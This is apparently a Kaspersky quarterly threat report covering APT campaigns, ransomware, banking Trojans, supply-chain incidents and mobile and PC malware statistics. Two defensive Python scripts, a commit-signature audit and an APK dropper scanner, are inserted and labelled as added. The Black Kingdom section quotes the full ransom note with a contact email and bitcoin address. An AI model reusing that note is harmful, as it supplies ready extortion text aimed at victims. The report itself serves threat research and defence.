One such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed “Moriya”, was used to deploy passive backdoors on public-facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.

This tool was used as part of an ongoing campaign that we named “TunnelSnake“. The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.

Since neither the rootkit nor the other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker’s infrastructure. However, the bulk of the detected tools besides Moriya consist of both proprietary and well-known pieces of malware previously used by Chinese-speaking threat actors, giving a clue to the attacker’s origin.


On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.

While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 – RS5, 18362 – 19H1, 18363 – 19H2, 19041 – 20H1, 19042 – 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.

On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.

The exploit chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a “remote shell”-style backdoor, which in turn connects to the C2 to get commands.

We weren’t able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity PuzzleMaker.

Andariel adds ransomware to its toolset

In April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.

During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.

Historically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.

We also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.

Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlining the financial motivation of this threat actor.

Ferocious Kitten

Ferocious Kitten is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to researchers on Twitter. Since then, one of its implants has been analyzed by a Chinese threat intelligence firm.

We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed “MarkiRAT”, records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim’s computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.

Ferocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren’t reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.

Other malware

Evolution of JSWorm ransomware

While ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as WannaCry and NotPetya. Many ransomware gangs have switched to the more profitable tactic of “big-game hunting”; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there’s now a well-developed eco-system underpinning ransomware attacks.

As a result, even though the number of ransomware attacks has fallen, and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.

We recently published analysis of one such ransomware family, named JSWorm. This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.

Each “re-branded” version has included alterations to different aspects of the code – file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.

Black Kingdom ransomware

Black Kingdom first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka ProxyLogon). This ransomware family is much less sophisticated than other Ransomware-as-a-Service (RaaS) or big game hunting families. The group’s involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.

The malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a script to recover files encrypted with the embedded key.

Black Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.

***************************
| We Are Back ?
***************************

We hacked your (( Network )), and now all files, documents, images, databases and other important data are safely encrypted using the strongest algorithms ever.
You cannot access any of your files or services .
But do not worry. You can restore everthing and get back business very soon ( depends on your actions )

before I tell how you can restore your data, you have to know certain things :

We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.
To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )

***************************
| What guarantees ?
***************************

We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free
just send the files you want to decrypt to (support_blackkingdom2@protonmail.com

***************************************************
| How to contact us and recover all of your files ?
***************************************************

The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .

[ + ] Instructions:

1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com
2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :
[ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]
3- confirm your payment by sending the transfer url to our email address
4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you, so that you can recover all your files.

## Note ##
Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.
By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.

Your ID ==> FDHJ91CUSzXTquLpqAnP

After decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder available on GitHub. The group adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key. We were not able to attribute Black Kingdom to any known threat group.

Based on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.

Gootkit: the cautious banking Trojan

Gootkit belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it’s not very common, new versions of the Trojan may remain under the researchers’ radar for long periods.

It is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploit kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.

Gootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan’s loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.

In 2019, Gootkit stopped operating after it experienced a data leak, but has been active again since November 2020. Most of the victims are located in EU countries such as Germany and Italy.

Bizarro banking Trojan expands into Europe

Bizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.

As with Tetrade, Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.

Bizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.

Bizarro is one of several banking Trojans from South America that have extended their operations into other regions – mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.

Malicious code in APKPure app

In early April, we discovered malicious code in version 3.17.18 of the official client of the APKPure app store, a popular alternative source of Android apps. The incident seems to be similar to what happened with CamScanner, when the app’s developer implemented an adware SDK from an unverified source.

When launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the Triada Trojan. If the device is older (Android 6 or 7, and without security updates installed) it could be the xHelper Trojan.

We reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.

Browser lockers

Browser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The “locking” consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.

This type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. The tricks used by the scammers include imitating the infamous “Blue Screen of Death” (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.

In our report on browser lockers, we examined two families of lockers that mimic government websites.

Both families spread mainly via advertising networks, primarily aimed at selling “adult” content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).

These threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don’t fall for the cybercriminals’ smoke-and-mirrors tactics.

Malware targets Apple M1 chip

Last November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. Unfortunately, just months after the release, malware writers had already adapted several malware families to the new processor.

Attempted supply-chain attack using PHP

In March, unknown attackers tried to carry out a supply-chain attack by introducing malicious code into the PHP scripting language. The developers of PHP make changes to the code using a common repository built on the Git version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, around 80 per cent of which use PHP.
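The paragraph above credits a routine check with catching the backdoor. One check that can be made routine rather than lucky is a signature audit of recent commits: every commit in a protected branch must carry a signature that verifies, and the signing key must be on the maintainers' allow-list. The example below is added here and is not the PHP project's tooling or part of the report; it parses the output of `git log` with the `%G?` (signature status) and `%GF` (signing-key fingerprint) placeholders, which are documented in git-log(1). The commit hashes, fingerprints and author names in the sample are constructed placeholders.

```python
import subprocess

# Signature statuses git prints for the %G? placeholder (see git-log(1)):
#   G good, B bad, U good but untrusted key, X good but expired signature,
#   Y good but expired key, R good but revoked key, E cannot be checked, N no signature
STATUS_TEXT = {
    "G": "good signature", "B": "bad signature", "U": "good signature, untrusted key",
    "X": "good signature, expired", "Y": "good signature, key expired",
    "R": "good signature, key revoked", "E": "signature could not be checked", "N": "unsigned",
}
LOG_FORMAT = "%H%x09%G?%x09%GF%x09%an"  # hash, status, signing-key fingerprint, author (tab-separated)


def parse_log(text):
    """Turn the tab-separated output of `git log --format=LOG_FORMAT` into dicts."""
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        commit, status, fingerprint, author = line.split("\t", 3)
        commits.append({"commit": commit, "status": status,
                        "fingerprint": fingerprint, "author": author})
    return commits


def audit(commits, trusted_fingerprints):
    """Return (commit, reason) for every commit that fails the policy:
    the signature must verify (G) and the key must be on the allow-list.
    A valid signature from an unknown key is flagged too, because anyone can
    generate a key and sign a commit under a maintainer's name."""
    findings = []
    for c in commits:
        if c["status"] != "G":
            findings.append((c["commit"], STATUS_TEXT.get(c["status"], "unknown status " + c["status"])))
        elif c["fingerprint"].upper() not in trusted_fingerprints:
            findings.append((c["commit"], "signed by key not on the allow-list: " + c["fingerprint"]))
    return findings


def audit_repo(repo_path, trusted_fingerprints, rev_range="HEAD~50..HEAD"):
    """Run the check against a real repository (needs git and the maintainers' public keys imported)."""
    out = subprocess.run(["git", "-C", repo_path, "log", "--format=" + LOG_FORMAT, rev_range],
                         check=True, capture_output=True, text=True).stdout
    return audit(parse_log(out), trusted_fingerprints)


# Constructed sample: placeholder hashes, fingerprints and names, not real PHP history.
SAMPLE_LOG = "\n".join([
    "1111111111111111111111111111111111111111\tG\tAAAA0000AAAA0000AAAA0000AAAA0000AAAA0000\tMaintainer One",
    "2222222222222222222222222222222222222222\tN\t\tContributor Two",
    "3333333333333333333333333333333333333333\tG\tBBBB0000BBBB0000BBBB0000BBBB0000BBBB0000\tMaintainer One",
    "4444444444444444444444444444444444444444\tB\tAAAA0000AAAA0000AAAA0000AAAA0000AAAA0000\tMaintainer One",
])
TRUSTED_KEYS = {"AAAA0000AAAA0000AAAA0000AAAA0000AAAA0000"}  # hypothetical allow-list

if __name__ == "__main__":
    for commit, reason in audit(parse_log(SAMPLE_LOG), TRUSTED_KEYS):
        print(commit[:12], reason)
```

The third sample commit is the interesting case: it is correctly signed and carries a maintainer's name, yet fails the audit because the key is not the maintainer's. Author and committer names in Git are free text, so only the key fingerprint ties a commit to a person.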

12 August 2021

IT threat evolution in Q2 2021. Mobile statistics

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

In Q2 2021, according to data from Kaspersky Security Network:

  • 14,465,672 malware, adware and riskware attacks were prevented.
  • The largest share of all detected threats accrued to RiskTool programs — 38.48%.
  • 886,105 malicious installation packages were detected, of which:
      • 24,604 packages were mobile banking Trojans;
      • 3,623 packages were mobile ransomware Trojans.

Quarterly highlights

Android’s own security has changed dramatically since the first devices were released with Android 1.6 Donut and it became the dominant OS on the market. The development of Google Play Protect is worth highlighting, and the rights of apps have since been severely restricted: they now have to request every permission from users explicitly. Moreover, the security subsystem was moved to a separate updatable component, independent of the device manufacturer. Yet there is one thing both the old 1.6 version and the latest Android 11 have in common which significantly compromises the operating system’s security: the freedom to install apps from third-party sources. It’s great in terms of OS user-friendliness — I use it myself almost every day — but it gives all sorts of cybercriminals a real “window of opportunity” from a security point of view. It’s also the reason why third-party distribution platforms for Android apps have mushroomed. These platforms offer the most diverse range of downloads, from clones of popular apps to different types of malware. However, the platform itself is not the only danger: the client app that works with it, which loads and installs apps into the system much like the official Google Play client does, can also be to blame.

In Q2 2021, we discovered that the popular APKPure app has been infected by a malicious module. The developers implemented an unverified advertisement SDK, which downloaded Trojans to users’ devices without them knowing. In other words, a Trojan dropper found a way into the program together with the SDK. The malware’s next move depended on the Android OS version it managed to infect. Users with relatively recent versions would get off more lightly with just some annoying advertising and subscriptions, but devices running older versions were in for a plethora of threats such as the xHelper mobile Trojan.

This review will conclude with a chart depicting mobile threats detected on devices with installed Kaspersky security solutions.

Number of attacks targeting users of Kaspersky mobile solutions, Q2 2020 — Q2 2021

Mobile threats clearly are not letting up, and the number of attacks remains persistently high. The number of malware, adware and riskware attacks exceeded the 14.4 million mark in the second quarter.

Mobile threat statistics

Kaspersky Lab detected 886,105 malicious installation packages in Q2 2021, 565,555 fewer than in the previous quarter and 359,789 fewer than in Q2 2020.

Number of detected malicious installation packages, Q2 2020 — Q2 2021

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type, Q1 and Q2 2021

More than a third of all the threats detected in Q2 2021 fell to RiskTool (38.48%). The share of this riskware rose sharply, by 23.04 p.p., against the backdrop of a decline in adware. The vast majority of detected apps of this type (93.52%) belong to the SMSreg family.

Adware came in second (34.10%), down 27.33 p.p. compared to the previous quarter. The worst offenders were adware from the Ewind family (52.38% of all adware threats detected), HiddenAd (18.11%) and FakeAdBlocker (13.56%).

Trojans of various types round out the top three (16.48%), their share having increased by 8.21 p.p. The Trojans that stood out came from the Mobtes (84.89%), Boogr (7.71%) and Plangton (1.53%) families.

Top 20 mobile malware programs

Note that the malware rankings below exclude PUAs, such as riskware or adware.

Rank  Verdict  %*
1   DangerousObject.Multi.Generic   39.94
2   Trojan-Spy.AndroidOS.SmsThief.po   10.03
3   Trojan-SMS.AndroidOS.Agent.ado   5.68
4   DangerousObject.AndroidOS.GenericML   4.29
5   Trojan.AndroidOS.Agent.vz   3.85
6   Trojan-Dropper.AndroidOS.Agent.rp   3.56
7   Trojan.AndroidOS.Triada.el   3.33
8   Trojan-Downloader.AndroidOS.Necro.d   3.21
9   Trojan.AndroidOS.Triada.ef   3.09
10  Trojan.AndroidOS.MobOk.ad   3.01
11  Trojan-Dropper.AndroidOS.Hqwar.bk   2.81
12  Trojan.AndroidOS.Hiddad.gx   2.77
13  Trojan.AndroidOS.Whatreg.b   2.51
14  Trojan-Dropper.AndroidOS.Triada.ap   2.51
15  Trojan-Downloader.AndroidOS.Gapac.d   2.37
16  Trojan-Dropper.AndroidOS.Hqwar.cf   1.90
17  Trojan-Downloader.AndroidOS.Agent.kx   1.90
18  Trojan.AndroidOS.Triada.dq   1.89
19  Trojan-Banker.AndroidOS.Svpeng.t   1.88
20  HackTool.AndroidOS.Wifikill.c   1.86

* Unique users attacked by this malware as a percentage of all attacked users of Kaspersky mobile solutions.

The DangerousObject.Multi.Generic verdict (39.94%), which we apply to all malware detected with cloud technology, tops the list as usual. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is essentially how the newest malware is detected.

Second place went to a Trojan called Trojan-Spy.AndroidOS.SmsThief.po (10.03%), whose main task is monitoring incoming text messages and forwarding the intercepted data to the cybercriminals’ server. The malware is essentially a “Russian doll”: the outer layer is a Trojan dropper, and the encrypted DEX file of SmsThief.po itself is buried inside the APK. This Trojan mostly targeted users in Russia.

The Top 3 was rounded out by Trojan-SMS.AndroidOS.Agent.ado (5.68%), a form of malware which sends text messages to short premium-rate numbers draining the victim’s mobile account. In order for the attack to succeed, the Trojan waits for a confirmation code (Advice of charge) from the provider and sends a response. Like the previously mentioned form of malware, Agent.ado mostly targets users in Russia.

Fourth place was taken by DangerousObject.AndroidOS.GenericML (4.29%). This verdict is assigned to files recognized as malicious by our machine-learning systems.

Fifth place went to Trojan.AndroidOS.Agent.vz (3.85%), which downloads a payload while serving as a payload for another malicious object. Cybercriminals create these types of chains to ensure malware remains on the device. Even if the victim removes one of the links in the chain, their device is bound to be reinfected by another.

Another “Russian doll” came in sixth: Trojan-Dropper.AndroidOS.Agent.rp (3.56%). Its outer layer is Java code that calls into a native library to decrypt a DEX file stored somewhere inside the APK. The inner layer is deployed for the second stage of the attack, the malware we detect as Trojan-Downloader.AndroidOS.Agent.ki. Our remotely collected data indicates that users with Agent.rp also encounter Trojan-Dropper.AndroidOS.Triada.ap (2.51%, 14th place in our rating), Trojan.AndroidOS.Whatreg.b (2.51%, 13th place) and Trojan-Downloader.AndroidOS.Necro.d (3.21%, 8th place). It is quite likely that all of these Trojans detected in Q2 2021 were part of the same campaign and served as links in the same infection chain. The same applies to the other Trojans from the Trojan.AndroidOS.Triada family ranked seventh, ninth and eighteenth on our list.
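The SmsThief.po and Agent.rp droppers described above share one structural trait: the package's visible classes.dex is only a wrapper, and the real payload is a second DEX file hidden inside the APK, in clear or encrypted, with a native library doing the decryption. The following triage script is an added example (not Kaspersky's code) that looks for exactly that layout: DEX files stored anywhere other than the root classes*.dex slots, high-entropy blobs under assets/ or res/raw/ that are not a known media or archive format, and the presence of native code. The APK it scans is a constructed stand-in built in memory with zipfile; the entropy threshold, minimum size and the set of "known format" magics are assumptions to tune, and a hit is a reason to unpack the sample by hand, not a verdict.

```python
import hashlib
import io
import math
import zipfile
from collections import Counter

DEX_MAGIC = b"dex\n"          # every DEX file begins "dex\n" + 3-digit version + NUL
KNOWN_MAGIC = (b"PK\x03\x04", b"\x89PNG", b"\xff\xd8\xff", b"RIFF", b"OggS", b"\x1f\x8b")
HIGH_ENTROPY = 7.5            # bits per byte (assumed threshold); encrypted or compressed data sits near 8.0
MIN_SUSPECT_SIZE = 4096       # skip small config blobs (assumed threshold)


def shannon_entropy(data: bytes) -> float:
    """Entropy of `data` in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_expected_dex(name: str) -> bool:
    """classes.dex, classes2.dex, ... in the APK root are where a normal app keeps its code."""
    return "/" not in name and name.startswith("classes") and name.endswith(".dex")


def scan_apk(apk_bytes: bytes) -> dict:
    """Inspect an APK (as bytes); return suspicious entries and whether the package ships native code."""
    findings = []
    has_native = False
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if info.is_dir() or is_expected_dex(name):
                continue
            if name.startswith("lib/") and name.endswith(".so"):
                has_native = True   # a native library is where a dropper like Agent.rp can keep the decryptor
                continue
            data = zf.read(info)
            if data.startswith(DEX_MAGIC):
                findings.append((name, "DEX file outside classes*.dex"))
            elif (name.startswith(("assets/", "res/raw/"))
                  and len(data) >= MIN_SUSPECT_SIZE
                  and not data.startswith(KNOWN_MAGIC)):
                ent = shannon_entropy(data)
                if ent > HIGH_ENTROPY:
                    findings.append((name, f"high-entropy blob ({ent:.2f} bits/byte), possible encrypted DEX"))
    return {"findings": findings, "has_native_lib": has_native}


def build_sample_apk() -> bytes:
    """Constructed sample laid out like the droppers in the text. Not a real APK:
    the manifest, classes.dex and the .so are placeholders."""
    noise = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(256))  # 8 KiB, near-uniform bytes
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<placeholder/>")
        zf.writestr("classes.dex", DEX_MAGIC + b"035\x00" + b"\x00" * 64)        # the visible outer layer
        zf.writestr("lib/armeabi-v7a/libnative.so", b"\x7fELF" + b"\x00" * 64)   # decryptor stand-in
        zf.writestr("assets/logo.png", b"\x89PNG\r\n\x1a\n" + noise)              # benign: known format
        zf.writestr("assets/config.bin", noise)                                   # "encrypted" inner DEX
        zf.writestr("assets/data.dat", DEX_MAGIC + b"035\x00" + b"\x00" * 64)    # clear-text inner DEX
    return buf.getvalue()


if __name__ == "__main__":
    report = scan_apk(build_sample_apk())
    print("native library present:", report["has_native_lib"])
    for entry, reason in report["findings"]:
        print(f"  {entry}: {reason}")
```

On the constructed sample the scan reports assets/data.dat as a DEX outside the root and assets/config.bin as a high-entropy blob, and notes the native library, while the PNG and the legitimate classes.dex pass. Zipped or gzipped assets are deliberately excluded from the entropy check because compression alone produces the same signature as encryption.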

Our Top 10 is completed by Trojan.AndroidOS.MobOk.ad (3.01%), the main aim of which is subscribing victims to paid mobile services. MobOk family malware attacked mobile users in Russia more often than in any other country.

Malware from the Hqwar family (Trojan-Dropper.AndroidOS.Hqwar.bk and .cf) came in eleventh and sixteenth place in Q2. The number of known objects from this family just keeps on growing, and had reached 370,744 files by the time this report was compiled.

Twelfth place was taken by Trojan.AndroidOS.Hiddad.gx (2.77%), which aims to display banner ads, ensure a constant presence on the device and hide icons in the app bar.

Fifteenth place went to Trojan-Downloader.AndroidOS.Gapac.d (2.37%) — a Trojan which is also a link in a chain of infection and essentially serves to download other malware.

The Trojan that came in seventeenth in Q2 was Trojan-Downloader.AndroidOS.Agent.kx (1.90%). It is spread through legitimate software and serves the main task of downloading advertising apps.

The well-known banking Trojan Svpeng (1.88%), which we’ve written about on multiple occasions, came in nineteenth place.

Last on our Top 20 is HackTool.AndroidOS.Wifikill.c, which carries out Denial-of-Service (DoS) attacks on users to disconnect them from a Wi-Fi network. The victim is forced to reconnect to the same network, giving the attacker a chance to capture the handshake and set up a MitM attack.

Geography of mobile threats

Map of infection attempts by mobile malware, Q2 2021

Top 10 countries by share of users attacked by mobile malware

Rank  Country*  %**
1   Iran   23.79
2   Saudi Arabia   23.09
3   China   18.97
4   Algeria   18.47
5   India   16.68
6   Morocco   12.97
7   Malaysia   12.81
8   Nigeria   11.76
9   Ecuador   11.54
10  Bangladesh   11.31

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Share of unique users attacked as a percentage of all users of Kaspersky mobile security solutions in the country.

Iran was the most frequently targeted country in Q2 2021 by share of attacked users (23.79%). The most commonly encountered threats there were annoying adware from the AdWare.AndroidOS.Notifyer and AdWare.AndroidOS.Fyben families.

Saudi Arabia is in second place (23.09%). Users in this country most frequently encountered adware, but from the AdWare.AndroidOS.HiddenAd and AdWare.AndroidOS.FakeAdBlocker families.

China rounded out the top three (18.97%); the most common threats there came from the riskware families RiskTool.AndroidOS.SmsPay and RiskTool.AndroidOS.Wapron. Both target the victim’s mobile account: the former abuses a shady SMS monetization scheme used in certain games, while the latter sends text messages purportedly as payment for porn viewings. Another Trojan that made the list of top threats in China was Trojan.AndroidOS.Najin.a.

Mobile banking Trojans

In the reporting period, we detected 24,604 installation packages for mobile banking Trojans, 710 more than in Q1 2021 but 16,801 fewer than a year earlier in Q2 2020.

The worst offenders were the creators of the Trojan family known as Trojan-Banker.AndroidOS.Agent, which accounted for 66.23% of all detected banking Trojans. Other threats which stood out were from families called Trojan-Banker.AndroidOS.Gustuff (8.19%) and Trojan-Banker.AndroidOS.Anubis (6.86%). It’s interesting that the latter is one of the most dangerous financial Trojans but one that is very rarely encountered in the wild according to our remotely collected data.

Number of mobile banking Trojan installation packages detected by Kaspersky, Q1 and Q2 2021

Ten most common mobile bankers

Rank  Verdict  %*
1   Trojan-Banker.AndroidOS.Svpeng.t   20.90
2   Trojan-Banker.AndroidOS.Agent.eq   19.46
3   Trojan-Banker.AndroidOS.Svpeng.q   8.92
4   Trojan-Banker.AndroidOS.Anubis.t   7.26
5   Trojan-Banker.AndroidOS.Asacub.ce   5.44
6   Trojan-Banker.AndroidOS.Agent.ep   3.08
7   Trojan-Banker.AndroidOS.Hqwar.t   3.03
8   Trojan-Banker.AndroidOS.Agent.cf   2.43
9   Trojan-Banker.AndroidOS.Regon.p   2.40
10  Trojan-Banker.AndroidOS.Asacub.ar   2.33

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

Geography of mobile banking threats, Q2 2021

Top 10 countries by shares of users attacked by mobile banking Trojans

Rank  Country*  %**
1   Japan   1.62
2   Spain   0.76
3   France   0.71
4   Turkey   0.64
5   Australia   0.50
6   Norway   0.26
7   South Korea   0.23
8   Italy   0.20
9   Finland   0.16
10  Belgium   0.15

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Japan has the largest share of unique users attacked by mobile financial threats in Q2 2021 (1.62%). The malware detected most often in this country was Trojan-Banker.AndroidOS.Agent.eq, which accounted for 99% of all mobile financial attacks there.

Spain followed by a wide margin with 0.76%. The most common verdicts there were Trojan-Banker.AndroidOS.Regon.p (71.38%), Trojan-Banker.AndroidOS.Agent.io (19.15%) and Trojan-Banker.AndroidOS.Cebruser.d (3.75%).

The country that came in third was France (0.71%), where Trojan-Banker.AndroidOS.Agent.eq (98.75%) was also found to be widespread.

Mobile ransomware Trojans

In Q2 2021, we detected 3,623 installation packages for mobile ransomware Trojans, 27 more than in the previous quarter but 182 fewer than in Q2 2020.

Number of mobile ransomware Trojan installation packages detected by Kaspersky, Q1 and Q2 2021

Top 10 most common mobile ransomware

Rank  Verdict  %*
1   Trojan-Ransom.AndroidOS.Pigetrl.a   66.96
2   Trojan-Ransom.AndroidOS.Rkor.an   4.65
3   Trojan-Ransom.AndroidOS.Small.as   3.85
4   Trojan-Ransom.AndroidOS.Fusob.h   2.34
5   Trojan-Ransom.AndroidOS.Rkor.au   2.29
6   Trojan-Ransom.AndroidOS.Rkor.as   2.20
7   Trojan-Ransom.AndroidOS.Rkor.aw   2.11
8   Trojan-Ransom.AndroidOS.Small.ce   1.17
9   Trojan-Ransom.AndroidOS.Rkor.at   1.02
10  Trojan-Ransom.AndroidOS.Soobek.a   1.00

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

Geography of mobile ransomware Trojans, Q2 2021

Top 10 countries by share of users attacked by mobile ransomware Trojans

Rank  Country*  %**
1   Kazakhstan   0.37
2   Sweden   0.12
3   Kyrgyzstan   0.10
4   China   0.09
5   Uzbekistan   0.07
6   Saudi Arabia   0.06
7   Morocco   0.04
8   Pakistan   0.03
9   Lithuania   0.03
10  USA   0.03

* Excluded from the rating are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Unique users attacked by ransomware trojans as a percentage of all Kaspersky mobile security solution users in the country.

The leaders by share of users attacked by mobile ransomware Trojans were Kazakhstan (0.37%), Sweden (0.12%) and Kyrgyzstan (0.10%). In Kazakhstan and Sweden, users mostly encountered Trojans from the Trojan-Ransom.AndroidOS.Rkor family. In Kyrgyzstan, Trojan-Ransom.AndroidOS.Pigetrl.a was common alongside Rkor.

12 August 2021

IT threat evolution in Q2 2021. PC statistics

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q2 2021:

  • Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.
  • Web antivirus recognized 675,832,360 unique URLs as malicious.
  • Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.
